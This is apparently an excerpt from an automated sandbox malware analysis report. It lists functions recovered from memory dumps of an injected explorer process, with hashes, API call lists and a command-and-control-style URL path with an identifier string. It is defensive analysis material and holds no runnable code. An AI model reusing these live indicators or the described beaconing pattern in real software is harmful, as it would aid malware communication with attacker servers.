                                                                                                                                                                                                                        • Opcode ID: 433fd11cc7a8e3897c0cfcee7af86f806a51f7959c741a156b69d414921e067b
                                                                                                                                                                                                                        • Instruction ID: 172730ff45b9fa6bbd03f5c11d8b00cb5dec801820982ecbf140d12494a4f641
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 433fd11cc7a8e3897c0cfcee7af86f806a51f7959c741a156b69d414921e067b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C9E16F75A002168FCB24CF98C8C0B6DB7B1FF88314F2941ADD905AB795DB75EA91CB90
                                                                                                                                                                                                                        Function 0B9BF345 Relevance: .4, Instructions: 375COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2800816052.000000000B990000.00000040.00000400.00020000.00000000.sdmp, Offset: 0B990000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b990000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 433fd11cc7a8e3897c0cfcee7af86f806a51f7959c741a156b69d414921e067b
                                                                                                                                                                                                                        • Instruction ID: db18e515c5a3fff65a9f99cc271755c0dc6d604bccd1363a15e4da13fc70c77d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 433fd11cc7a8e3897c0cfcee7af86f806a51f7959c741a156b69d414921e067b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DFE17476E0021ACFCB24CF98CA80FA9B7B5FF48314F2941A9C815AB356D775E951CB90
                                                                                                                                                                                                                        Function 0B0CF2D8 Relevance: .0, Instructions: 7COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 729c3b4835a6834bc6ca702b346004f04212394b198bebd1968db775b09b660a
                                                                                                                                                                                                                        • Instruction ID: 239e6ff2d992f77ebcefca4cbf1040af71e8ec222ee97343004739d9b47dd191
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 729c3b4835a6834bc6ca702b346004f04212394b198bebd1968db775b09b660a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 58B0128F44DBE12CE3274E382C1348D1F455053A3078C0349D6D0000D1510048898331
                                                                                                                                                                                                                        Function 0B0CF390 Relevance: .0, Instructions: 3COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 7c307f67adb8aff98d3f095286b2b700dfcb55a183617c16c72d4ace8312b7d4
                                                                                                                                                                                                                        • Instruction ID: 038cc99b61fe1a58f79dc842e8ffe6d2d7c0790616e2838ebdfb41b054369831
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7c307f67adb8aff98d3f095286b2b700dfcb55a183617c16c72d4ace8312b7d4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                        Function 0DFFF298 Relevance: .0, Instructions: 1COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                        • Instruction ID: 33f440db8dcf76ed1806d7bd443262935e64228566635c654bb1f16f699d93a5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                        Function 0DF1F298 Relevance: .0, Instructions: 1COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                        • Instruction ID: 33f440db8dcf76ed1806d7bd443262935e64228566635c654bb1f16f699d93a5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                        Function 0B0CF298 Relevance: .0, Instructions: 1COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                        • Instruction ID: 33f440db8dcf76ed1806d7bd443262935e64228566635c654bb1f16f699d93a5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                        Function 0DFEA2D0 Relevance: 49.9, APIs: 33, Instructions: 363stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: memcpy$malloc$realloc$free$CriticalSectionlstrlen$EnterLeavewsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 812771569-0
                                                                                                                                                                                                                        • Opcode ID: e425c8c9010baec973b1aaef70cd1d9e112132e3c26451322e5c0209d42b8449
                                                                                                                                                                                                                        • Instruction ID: 343ae8140a7d0cebdda6bf7e434e57e73cf6b0b9a8d04526c75c6dc6de77f2d0
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e425c8c9010baec973b1aaef70cd1d9e112132e3c26451322e5c0209d42b8449
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0BE16D3260574487DB24DF2AE89432A73B1FB44BC5F048829CB8A4BB64EFBCD584CB40
                                                                                                                                                                                                                        Function 0DF0A2D0 Relevance: 49.9, APIs: 33, Instructions: 363stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: memcpy$malloc$realloc$free$CriticalSectionlstrlen$EnterLeavewsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 812771569-0
                                                                                                                                                                                                                        • Opcode ID: e425c8c9010baec973b1aaef70cd1d9e112132e3c26451322e5c0209d42b8449
                                                                                                                                                                                                                        • Instruction ID: a04de935833dfcc115ba5b11a80d3d8b7f3849d7cce20c3bcf7786bb5fadae53
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e425c8c9010baec973b1aaef70cd1d9e112132e3c26451322e5c0209d42b8449
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 19E1592660574587DB20DF6AE89833A7BA1FB48B85F01842ACB4B47B90EF7CD644DB50
                                                                                                                                                                                                                        Function 0B0BA2D0 Relevance: 49.9, APIs: 33, Instructions: 363stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: memcpy$malloc$realloc$free$CriticalSectionlstrlen$EnterLeavewsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 812771569-0
                                                                                                                                                                                                                        • Opcode ID: bd72915e342eb17227b8ff682739b4ad7a599079b99399dd9bdd7bf2ec0a713f
                                                                                                                                                                                                                        • Instruction ID: 2a602c39524aca02d71094c3433cd5c37bf676518b3d2a934c511562bec48dc7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd72915e342eb17227b8ff682739b4ad7a599079b99399dd9bdd7bf2ec0a713f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89E17C717057058BDB68DF66E994BAE73B2FB48B85F004829CA9A47B10EF7CD445CB40
                                                                                                                                                                                                                        Function 0DFEA0F0 Relevance: 27.2, APIs: 18, Instructions: 171stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$CriticalSectionmemcpy$Leavemallocstrncmp$Enterlstrlenrealloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4124047334-0
                                                                                                                                                                                                                        • Opcode ID: 37a7f167c4a68d043095de917dda88b28263c1c52b2eac013c1362846a156296
                                                                                                                                                                                                                        • Instruction ID: 649b86a76d159002e19678429b54613c4d1eeab7944984e3a01e2cfbe851ae4d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 37a7f167c4a68d043095de917dda88b28263c1c52b2eac013c1362846a156296
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B718D75605B8082EB08DF6AEC9432A7762BB88BD1F04C965DD4A9B764EFBCC4C4C350
                                                                                                                                                                                                                        Function 0DF0A0F0 Relevance: 27.2, APIs: 18, Instructions: 171stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$CriticalSectionmemcpy$Leavemallocstrncmp$Enterlstrlenrealloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4124047334-0
                                                                                                                                                                                                                        • Opcode ID: 37a7f167c4a68d043095de917dda88b28263c1c52b2eac013c1362846a156296
                                                                                                                                                                                                                        • Instruction ID: 62f2701aa2a5dcae60fd0b2dc9f58a661d49042377b52aebbc2298c33eab7c63
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 37a7f167c4a68d043095de917dda88b28263c1c52b2eac013c1362846a156296
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D714962605B4286EB45DFAAE9543367B61BB88BD1F06C436DD0B877A4EF3CC644C360
                                                                                                                                                                                                                        Function 0B0BA0F0 Relevance: 27.2, APIs: 18, Instructions: 171stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$CriticalSectionmemcpy$Leavemallocstrncmp$Enterlstrlenrealloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4124047334-0
                                                                                                                                                                                                                        • Opcode ID: 716d948569891237ecea57e4004c24a20d504f94926412f9b25c08f04a218a5d
                                                                                                                                                                                                                        • Instruction ID: b56d6e9cc8fbb40d98fafff5209ec05edffa907d7f3b6382a2a6f30e1e02707d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 716d948569891237ecea57e4004c24a20d504f94926412f9b25c08f04a218a5d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E713971701B008AEA489F62ED65BAB77A2BB89FD1F048925CD2A87764EF7CC045C340
                                                                                                                                                                                                                        Function 0B0A9200 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 107stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 0B0A9248
                                                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL ref: 0B0A9255
                                                                                                                                                                                                                        • lstrcpyA.KERNEL32 ref: 0B0A928A
                                                                                                                                                                                                                          • Part of subcall function 0B0AECD0: GetWindowsDirectoryA.KERNEL32 ref: 0B0AED1C
                                                                                                                                                                                                                          • Part of subcall function 0B0AECD0: GetVolumeInformationA.KERNEL32 ref: 0B0AED66
                                                                                                                                                                                                                          • Part of subcall function 0B0AECD0: wsprintfA.USER32 ref: 0B0AEDC7
                                                                                                                                                                                                                        • lstrcpyA.KERNEL32 ref: 0B0A92AD
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0B0A92BD
                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 0B0A9354
                                                                                                                                                                                                                          • Part of subcall function 0B0A9420: EnterCriticalSection.KERNEL32 ref: 0B0A942B
                                                                                                                                                                                                                          • Part of subcall function 0B0A9420: LeaveCriticalSection.KERNEL32 ref: 0B0A945B
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: send.WS2_32 ref: 0B0A729C
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: recv.WS2_32 ref: 0B0A7303
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: lstrcmpiA.KERNEL32 ref: 0B0A7363
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: lstrlenA.KERNEL32 ref: 0B0A7387
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: StrStrA.SHLWAPI ref: 0B0A739F
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: lstrcmpiA.KERNEL32 ref: 0B0A73BE
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: strtol.MSVCRT ref: 0B0A73D6
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0B0A92CD
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: lstrcpyA.KERNEL32 ref: 0B0A70CE
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: lstrcatA.KERNEL32 ref: 0B0A70DF
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: lstrcatA.KERNEL32 ref: 0B0A70F3
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: lstrcatA.KERNEL32 ref: 0B0A7107
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: lstrcatA.KERNEL32 ref: 0B0A7118
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: lstrcatA.KERNEL32 ref: 0B0A712C
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: lstrcatA.KERNEL32 ref: 0B0A714A
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: wsprintfA.USER32 ref: 0B0A7162
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: lstrcatA.KERNEL32 ref: 0B0A7176
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: lstrcatA.KERNEL32 ref: 0B0A718A
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: lstrcatA.KERNEL32 ref: 0B0A71C6
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: WSAStartup.WS2_32 ref: 0B0A71D6
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: socket.WS2_32 ref: 0B0A71F2
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: gethostbyname.WS2_32 ref: 0B0A7209
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: memcpy.MSVCRT ref: 0B0A7229
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: htons.WS2_32 ref: 0B0A7238
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: connect.WS2_32 ref: 0B0A724F
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: lstrlenA.KERNEL32 ref: 0B0A7265
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: send.WS2_32 ref: 0B0A727B
                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 0B0A936C
                                                                                                                                                                                                                        • lstrlenA.KERNEL32 ref: 0B0A937A
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$CriticalSection$lstrcpylstrlen$EnterLeavelstrcmpimemcpysendwsprintf$DirectoryInformationInitializeStartupVolumeWindowsconnectgethostbynamehtonsrecvsocketstrtol
                                                                                                                                                                                                                        • String ID: /VzCAHn.php?65D35BAB97073674480464$65D35BAB97073674480464
                                                                                                                                                                                                                        • API String ID: 1973528353-1458243092
                                                                                                                                                                                                                        • Opcode ID: 0dbcf65caac76370d19fda381bb2748fd0743ccba9b3d65d8d807d26070440cb
                                                                                                                                                                                                                        • Instruction ID: 9757bdb9f31ed1e00edd9a38697545629378aa9da556fa6f4de74938a1e3c849
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0dbcf65caac76370d19fda381bb2748fd0743ccba9b3d65d8d807d26070440cb
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3513432208B4185EB10DBA4F89179F73B5F788B84F400916DAAEA7774EF78C589CB40
                                                                                                                                                                                                                        Function 00B5F0F5 Relevance: 18.1, APIs: 12, Instructions: 120COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2785702920.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b40000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$_lock$_errno
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3029504548-0
                                                                                                                                                                                                                        • Opcode ID: 24da189340a75204b4623750191f2d8847b2b021e4ce95673c6449e63a54cafc
                                                                                                                                                                                                                        • Instruction ID: 87b76ee8346e620062131392c4b1a8970550b7e901959a8720d2a4841f200e8a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 24da189340a75204b4623750191f2d8847b2b021e4ce95673c6449e63a54cafc
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87310834615D0B8ADFADFB68C0A2B3962D2EF95302F9404F9AC0AD714ACF65D8498751
                                                                                                                                                                                                                        Function 02BFF0F5 Relevance: 18.1, APIs: 12, Instructions: 120COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2786722156.0000000002BE0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_2be0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$_lock$_errno
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3029504548-0
                                                                                                                                                                                                                        • Opcode ID: 24da189340a75204b4623750191f2d8847b2b021e4ce95673c6449e63a54cafc
                                                                                                                                                                                                                        • Instruction ID: 3550962d09f3c23d98c0817928148e5b387b9cdbad7bf6a23737559b64fd242e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 24da189340a75204b4623750191f2d8847b2b021e4ce95673c6449e63a54cafc
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9313E3461590A4ADFFDFB68C0B0B7D7297EF89309B8404AD8A0AC7999CF24D548CB51
                                                                                                                                                                                                                        Function 0B9AF0F5 Relevance: 18.1, APIs: 12, Instructions: 120COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2800816052.000000000B990000.00000040.00000400.00020000.00000000.sdmp, Offset: 0B990000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b990000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$_lock$_errno
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3029504548-0
                                                                                                                                                                                                                        • Opcode ID: 24da189340a75204b4623750191f2d8847b2b021e4ce95673c6449e63a54cafc
                                                                                                                                                                                                                        • Instruction ID: fec78deec1b952aa29d8248b5a38d235860d5661246a622459cea3d493c2ba8a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 24da189340a75204b4623750191f2d8847b2b021e4ce95673c6449e63a54cafc
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C0314838615D0A4FDFADFB68C1B2B7D36A6EFC9309F84042D880AC7299CE24D8019791
                                                                                                                                                                                                                        Function 0DFEDED0 Relevance: 18.1, APIs: 12, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4099253644-0
                                                                                                                                                                                                                        • Opcode ID: 8d9237138fac256352b7468f837725ce4fa5155e88b43dd2637f89ceafd7e2b3
                                                                                                                                                                                                                        • Instruction ID: 63333d869ad727bb8d62436975a9b68f375508023ded42b540b7b108d68dac00
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d9237138fac256352b7468f837725ce4fa5155e88b43dd2637f89ceafd7e2b3
